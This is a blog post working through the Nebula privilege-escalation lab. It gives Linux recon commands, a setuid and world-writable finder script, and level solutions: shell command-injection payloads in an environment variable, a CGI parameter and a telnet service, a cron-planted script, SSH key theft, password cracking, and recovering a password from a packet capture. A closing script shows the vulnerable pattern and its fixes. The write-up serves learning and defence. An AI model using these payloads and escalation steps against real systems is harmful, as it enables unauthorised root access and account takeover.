Saturday, 30 November 2013

Privilege escalation

First step: reconnaissance.
Who am I?
id
Where am I?
pwd
What is in there?
ls -al
Which system is this?
uname -a
cat /etc/*release*
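The same questions wrapped into a reusable script, as an added example (my own code, not from the blog or from any of the linked tools). It goes one step further than the list above and also looks for the two things the Nebula levels below turn into footholds: set-uid/set-gid binaries (level00) and world-writable directories that something privileged executes from (level03). The search root is a parameter, an assumption made so the functions can be pointed at a test tree instead of /.

```bash
#!/bin/bash
# Added example: minimal post-foothold enumeration. ROOT is a parameter
# (defaults to /) so the finders can be run against any directory tree.

# The identity/host facts the post lists first.
basic_recon() {
    echo "== id =="; id
    echo "== pwd =="; pwd
    echo "== kernel =="; uname -a
    echo "== release =="; cat /etc/*release* 2>/dev/null
}

# Set-uid and set-gid regular files under $1. level00 is found exactly
# this way; -xdev keeps find on one filesystem (skips /proc, /sys, NFS).
find_setuid() {
    local root="${1:-/}"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# World-writable directories under $1. If a cron job or a set-uid program
# executes whatever it finds in one (level03), that directory is the path up.
find_world_writable_dirs() {
    local root="${1:-/}"
    find "$root" -xdev -type d -perm -0002 ! -path '*/proc/*' 2>/dev/null
}

# Cron entries the current user is allowed to read.
list_cron() {
    cat /etc/crontab 2>/dev/null
    ls -la /etc/cron.d /etc/cron.daily /etc/cron.hourly 2>/dev/null
    crontab -l 2>/dev/null
}

if [ "${1:-}" = "--run" ]; then
    basic_recon
    echo "== setuid/setgid files =="; find_setuid /
    echo "== world-writable dirs =="; find_world_writable_dirs /
    echo "== cron =="; list_cron
fi
```

Run it with `--run` on the target; the two finders only report, the judgement of which hit is exploitable is still manual (compare level00 against level01, where the SUID binary needs more than just being executed).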

----

Sources:

http://insidetrust.blogspot.hu/2011/04/quick-guide-to-linux-privilege.html

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

http://www.rebootuser.com/?p=1623

https://www.netspi.com/blog/entryid/112/windows-privilege-escalation-part-1-local-administrator-privileges

Automated checkers:

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://www.rebootuser.com/?p=1758

Exercises:

http://exploit-exercises.com/nebula

level00

find / -perm -4000 -type f 2>/dev/null
/bin/.../flag00
getflag

level01

Here I did not quite understand what to do, so I looked at a solution - after that it was simpler...

http://www.mattandreko.com/2011/12/02/exploit-exercises-nebula-01/

level02

cd /home/flag02
flag02 builds the string "/bin/echo $USER is cool" and hands it to system(), so shell metacharacters in USER run as flag02:

export USER="a && /bin/bash && "
./flag02
getflag

level03

vi /home/level03/test
#!/bin/bash
getflag > /tmp/out

cp /home/level03/test /home/flag03/writable.d/

... (wait a minute or two for the cron job that runs every file in writable.d as flag03)
cat /tmp/out

level04

cd /home/flag04
ln -s /home/flag04/token /home/level04/t
./flag04 /home/level04/t
06508b5e-8909-4f38-b630-fdb148a848a2

level05

cd /home/flag05
ls -al
ls -al .backup
cp .backup/b* /home/level05
cd /home/level05
tar xvzf backup-19072011.tgz
ssh flag05@192.168.56.101 -i .ssh/id_rsa
getflag

level06

ls -al /home/flag06
grep flag06 /etc/passwd

save the passwd line into a file, a.pas:
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

john a.pas
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 15687  trying: 123456 - marley

exit
nebula login:flag06
Password: hello
getflag

level07

cd /home/flag07
more thttpd.conf

thttpd.conf shows the web server on port 7007 running as flag07; index.cgi passes the Host parameter straight into a ping command line, so a | after the host injects commands:

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101

PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.
64 bytes from 192.168.56.101: icmp_req=1 ttl=64 time=0.020 ms
64 bytes from 192.168.56.101: icmp_req=2 ttl=64 time=0.050 ms
64 bytes from 192.168.56.101: icmp_req=3 ttl=64 time=0.056 ms

--- 192.168.56.101 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.020/0.042/0.056/0.015 ms

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20ls%20-al

total 10
drwxr-x--- 2 flag07 level07  102 Nov 20  2011 .
drwxr-xr-x 1 root   root     260 Aug 27  2012 ..
-rw-r--r-- 1 flag07 flag07   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag07 flag07  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag07 flag07   675 May 18  2011 .profile
-rwxr-xr-x 1 root   root     368 Nov 20  2011 index.cgi
-rw-r--r-- 1 root   root    3719 Nov 20  2011 thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20id

uid=992(flag07) gid=992(flag07) groups=992(flag07)

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20getflag

You have successfully executed getflag on a target account

level08

cd /home/flag08
ls -al
cp capture.pcap /home/level08
cd /home/level08
scp capture.pcap user@192.168.56.102:.

wireshark capture.pcap

Follow TCP Stream

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b.....B.
..............................1.......!.."......"......!..........."........".."................
.....................

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)


..wwwbugs login: l.le.ev.ve.el.l8.8
..

Password: backdoor...00Rm8.ate
.

..

Login incorrect

wwwbugs login:



backdoor...00Rm8.ate

000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .

0x7f = DEL: three deletes after "backdoor" and one after "8", so the password actually entered is

backd00Rmate
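The same reconstruction done mechanically, as an added example (my own script, not part of the post or of any Wireshark feature): it takes the hex column of the "Follow TCP Stream" dump above and replays the keystrokes, erasing a character for every DEL (0x7f) or backspace (0x08) and stopping at the first carriage return. The captured byte sequence is embedded inline so the script runs offline.

```bash
#!/bin/bash
# Added example, not from the blog: recover what a user really typed from a
# keystroke-by-keystroke telnet capture (one byte per line in the dump).

# Pull the byte column out of dump lines of the form "000000B9  62  b".
hex_column() {
    awk 'NF >= 2 { h = h (h == "" ? "" : " ") $2 } END { print h }'
}

# Replay the keystrokes: 0x7f (DEL) and 0x08 (BS) erase the previous
# character, 0x0d/0x0a ends the line, everything else is appended.
replay_keystrokes() {
    local hex="$1" out="" byte oct
    for byte in $hex; do
        case "$byte" in
            7f|7F|08) out="${out%?}" ;;
            0d|0D|0a|0A) break ;;
            *)
                oct=$(printf '%03o' "0x$byte")   # hex -> octal escape
                out="$out$(printf "\\$oct")"
                ;;
        esac
    done
    printf '%s\n' "$out"
}

# The bytes from the capture above (copied from the hex column).
CAPTURED='62 61 63 6b 64 6f 6f 72 7f 7f 7f 30 30 52 6d 38 7f 61 74 65 0d'

if [ "${1:-}" = "--demo" ]; then
    replay_keystrokes "$CAPTURED"   # backd00Rmate
fi
```

For a longer session, save the Wireshark hex dump to a file and feed it through: `replay_keystrokes "$(hex_column < dump.txt)"`. Failed attempts such as the one above ("Login incorrect") are worth replaying too, since they are usually an old or neighbouring password of the same account.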

nebula login: flag08
Password: backd00Rmate

getflag

level09

This exercise exceeded my current knowledge :)

http://www.mattandreko.com/2011/12/10/exploit-exercises-nebula-09/

level10

ls -al
more .viminfo
strings x

This was a hard exercise, but since I got hold of the necessary code in two steps I did not tire myself out with it (of course I looked up what the real solution to the exercise is, but in the end, if it goes more easily, I do not bother with the harder route.)

http://www.mattandreko.com/2011/12/11/exploit-exercises-nebula-10/

http://www.pedramhayati.com/2012/02/01/nebula-level10-solution/

level11

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level12

Port 5001 is flag12's Lua service, which drops the line it receives into a shell command (echo <input> | sha1sum), so a leading pipe injects a command that runs as flag12:

telnet 127.0.0.1 5001
| ls -al > /tmp/a

cat /tmp/a

telnet 127.0.0.1 5001
| getflag > /tmp/b

cat /tmp/b
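Levels 02, 07 and 12 are the same bug three times: attacker-controlled text is pasted into a command string that a shell then re-parses. The following is an added example written for this post (not Nebula's code and not the blog author's), showing the vulnerable shape in shell next to the two fixes a practitioner actually applies: pass the value as an argument so no shell sees it, or allow-list it before it reaches a command line. `greet_vuln`, `greet_safe`, `is_valid_host` and `ping_host` are names chosen here; the payload strings are the ones used in the levels above.

```bash
#!/bin/bash
# Added example, not from the blog or from Nebula: the single bug behind
# levels 02, 07 and 12. Metacharacters such as && | ; and backticks in
# attacker-controlled text turn data into commands once a shell parses it.

# Vulnerable shape: build a string and hand it to a shell. This is what
# system("/bin/echo $USER is cool") (level02), a backtick ping in index.cgi
# (level07) and io.popen("echo "..pw.." | sha1sum") (level12) all do.
greet_vuln() {
    local name="$1"
    sh -c "/bin/echo $name is cool"
}

# Fix 1: never re-parse. The value is a single argv element, /bin/echo is
# exec'd directly and no shell ever interprets the string.
greet_safe() {
    local name="$1"
    /bin/echo "$name" is cool
}

# Fix 2: when the value must reach a command line (level07's Host
# parameter), allow-list it first. A hostname or IPv4 literal starts with a
# letter or digit and contains only letters, digits, dots and hyphens, so
# "|", ";", spaces and a leading "-" (option injection) are all rejected.
is_valid_host() {
    case "$1" in
        '' | [!A-Za-z0-9]* | *[!A-Za-z0-9.-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Hardened version of what index.cgi does with ?Host=.
ping_host() {
    local host="$1"
    is_valid_host "$host" || { echo "rejected host: $host" >&2; return 1; }
    ping -c 3 "$host"
}

if [ "${1:-}" = "--demo" ]; then
    echo '--- vulnerable (id runs):'; greet_vuln 'a && id && '
    echo '--- safe (just echoed):';   greet_safe 'a && id && '
    ping_host '192.168.56.101| ls -al' || true
fi
```

The level02 payload `USER="a && /bin/bash && "` is `greet_vuln` with a shell instead of `id`; with `greet_safe` the same string is printed back verbatim. Note that the allow-list is the weaker of the two fixes: it is only needed when the design forces the value into a shell, and it must be a strict allow-list, not a blacklist of a few characters.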

level13

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level14

cd /home/flag14
cat token
./flag14 -e
aaaaaaaaaaaaaaaaaaaa
abcdefghijklmnopqrst

flag14 -e adds each character's position to it (position 0 unchanged, position 1 +1, ...), so the token is recovered by subtracting the index again:

vi /home/level14/decode.pl

#!/usr/bin/perl
use strict;
use warnings;

# Reverse flag14 -e: byte i of the ciphertext was shifted up by i,
# so shift it back down by i.
while (my $line = <STDIN>) {
    chomp($line);
    my $len = length($line);
    for (my $i = 0; $i < $len; $i++) {
        my $c = ord(substr($line, $i, 1));
        print chr($c - $i);
    }
    print "\n";
}

perl /home/level14/decode.pl < /home/flag14/token
8457c118-887c-4e40-a5a6-33a25353165

level15-level19

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

I did not feel like getting into these now. And anyway, they exceeded my current level of preparation.
The Privilege Escalation exercises can come next..... Now I will dig into this part a bit.
